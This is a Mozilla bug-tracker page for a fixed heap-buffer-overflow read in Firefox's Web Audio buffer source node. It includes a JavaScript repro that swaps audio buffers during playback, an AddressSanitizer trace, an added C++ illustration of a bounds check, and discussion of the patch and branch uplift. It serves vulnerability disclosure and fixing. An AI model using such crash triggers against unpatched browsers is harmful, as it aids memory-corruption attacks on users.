Closed Bug 874915 Opened 11 years ago Closed 11 years ago

Heap-buffer-overflow READ in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer

Categories

(Core :: Web Audio, defect)

x86_64
All
defect
Not set
normal

Tracking

RESOLVED FIXED
mozilla24
Tracking Status
firefox21 --- unaffected
firefox22 + disabled
firefox23 + disabled
firefox24 + fixed
firefox-esr17 --- unaffected
b2g18 --- unaffected

People

(Reporter: attekett, Assigned: ehsan.akhgari)

References

Details

(4 keywords, Whiteboard: [asan][adv-main24-])

Attachments

(2 files)

Tested on:

OS: Ubuntu 12.04

Firefox: ASAN opt-build 24.0a1 from
https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1369217427/

Repro-case:

<script>
// Reporter's testcase: one AudioContext and one buffer source node.
var Context0 = new AudioContext();
var BufferSource6 = Context0.createBufferSource();

// Keep replacing the node's buffer with an 11283-sample buffer
// while the node is playing.
setInterval(function() {
    BufferSource6.buffer = function() {
        var length = 11283;
        var Buffer = Context0.createBuffer(1, length, Context0.sampleRate);
        var bufferData = Buffer.getChannelData(0);
        for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i * 624); }
        return Buffer;
    }();
}, 0);

// start(when, offset, duration): playback with a non-zero offset and duration.
BufferSource6.start(0.15831333969254047, 0.23571860056836158, 0.529235512483865);

// Assign a longer, 48517-sample buffer; the setInterval callback above
// later swaps in the shorter one.
BufferSource6.buffer = function() {
    var length = 48517;
    var Buffer = Context0.createBuffer(1, length, Context0.sampleRate);
    var bufferData = Buffer.getChannelData(0);
    for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i * 365); }
    return Buffer;
}();
</script>


ASAN-report:

==31496== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f44ca227118 at pc 0x7f44f856318d bp 0x7f44d0c10070 sp 0x7f44d0c10068
READ of size 1 at 0x7f44ca227118 thread T26
    #0 0x7f44f856318c in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer(mozilla::AudioChunk*, unsigned int, unsigned long, unsigned long, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:172
    #1 0x7f44f856171f in mozilla::dom::AudioBufferSourceNodeEngine::ProduceAudioBlock(mozilla::AudioNodeStream*, mozilla::AudioChunk const&, mozilla::AudioChunk*, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:392
    #2 0x7f44f84d117e in mozilla::AudioNodeStream::ProduceOutput(long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/AudioNodeStream.cpp:411
    #3 0x7f44f853ec83 in mozilla::MediaStreamGraphImpl::ProduceDataForStreamsBlockByBlock(unsigned int, long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:937
    #4 0x7f44f8550e05 in mozilla::(anonymous namespace)::MediaStreamGraphThreadRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:1163
    #5 0x7f44fabe2212 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
.
.
.
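The testcase keeps swapping an 11283-sample buffer in for a 48517-sample one while start(when, offset, duration) is in progress, and ASan flags a read past the end of the current buffer in CopyFromInputBuffer. As an added illustration that is not Firefox's code (the real analysis and fix are in bug 874934, not on this page), here is a small C++ model of the check such a copy needs: the playback window computed for the buffer attached at start() is clamped against whatever buffer is current when a block is rendered, and the tail is zero-filled. The 48000 Hz sample rate, the sample values and the 128-sample block size are constructed assumptions.

```cpp
#include <algorithm>
#include <cstddef>
#include <vector>

// Hypothetical minimal model: one channel of float samples. Script may
// replace the node's buffer at any time, as the repro's setInterval() does.
using AudioBuffer = std::vector<float>;

// Playback window in samples, derived from start(when, offset, duration)
// against the sample rate in effect when start() was called.
struct Window {
  size_t position;   // next sample to read
  size_t remaining;  // samples left in the requested duration
};

Window WindowFor(double aOffsetSec, double aDurationSec, double aSampleRate) {
  return { static_cast<size_t>(aOffsetSec * aSampleRate),
           static_cast<size_t>(aDurationSec * aSampleRate) };
}

// Copy up to aOut.size() samples from aBuf starting at aWindow.position.
// The request is clamped to the buffer that is current *now*, not the one
// the window was computed from; anything not available is zero-filled.
// Returns the number of samples actually copied.
size_t CopyBlockChecked(const AudioBuffer& aBuf, const Window& aWindow,
                        std::vector<float>& aOut) {
  const size_t want = std::min(aWindow.remaining, aOut.size());
  const size_t avail = aWindow.position < aBuf.size()
                           ? aBuf.size() - aWindow.position : 0;
  const size_t n = std::min(want, avail);
  if (n > 0) {  // only form the source pointer when it is in bounds
    std::copy_n(aBuf.data() + aWindow.position, n, aOut.data());
  }
  std::fill(aOut.begin() + n, aOut.end(), 0.0f);
  return n;
}

// Orders events as the testcase does. Returns samples copied from the short
// buffer after the swap; an unchecked copy would read past its end instead.
size_t SimulateBufferSwap() {
  const double rate = 48000.0;                       // constructed sample rate
  AudioBuffer big(48517, 0.5f);                      // buffer attached at start()
  Window w = WindowFor(0.23571860056836158, 0.529235512483865, rate);
  std::vector<float> block(128);                     // one render quantum
  CopyBlockChecked(big, w, block);                   // 128 samples, in bounds
  AudioBuffer small(11283, 0.25f);                   // swapped in by script
  return CopyBlockChecked(small, w, block);          // position 11314 > 11283
}
```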
OS: Linux → All
Blocks: webaudio
Attached file Testcase
Attachment #752781 - Attachment mime type: text/plain → text/html
For the analysis, see bug 874934.
Attached patch Patch (v1)Splinter Review
Assignee: nobody → ehsan
Status: NEW → ASSIGNED
Attachment #752894 - Flags: review?(roc)
Blocks: 875617
https://hg.mozilla.org/mozilla-central/rev/04d09d48a9f1
Status: ASSIGNED → RESOLVED
Closed: 11 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla24
Flags: sec-bounty?
See Also: → 878478
WebAudio is disabled in Firefox 22 and 23, correct?
Flags: sec-bounty? → sec-bounty+
This should have gone through sec-approval before going in if it isn't disabled based on earlier comments and the rating. 

https://wiki.mozilla.org/Security/Bug_Approval_Process

We'll need to take this on Aurora and Beta now to make sure we don't ship it if it isn't disabled by default. Please nominate patches for those branches. What are the risks associated with doing so? Will the existing patch apply?
Whiteboard: [asan]
(In reply to Daniel Veditz [:dveditz] from comment #9)
> WebAudio is disabled in Firefox 22 and 23, correct?

Like all Web Audio bugs, it affects trunk, and 23, until 23 goes to beta.

(In reply to Al Billings [:abillings] from comment #10)
> We'll need to take this on Aurora and Beta now to make sure we don't ship it
> if it isn't disabled by default. Please nominate patches for those branches.
> What are the risks associated with doing so? Will the existing patch apply?

This is not needed on Beta since Web Audio is disabled there.  And it will be disabled on 23 once it gets to release.  Most if not all of these security bugs are relatively low-risk but there is some effort involved in uplifting them all to Aurora, and I'm not sure if we need to do that since we know that 23 will not ship Web Audio...
Mass moving Web Audio bugs to the Web Audio component.  Filter on duckityduck.
Component: Video/Audio → Web Audio
Whiteboard: [asan] → [asan][adv-main24-]
Flags: in-testsuite?
Flags: in-testsuite? → in-testsuite+
Group: core-security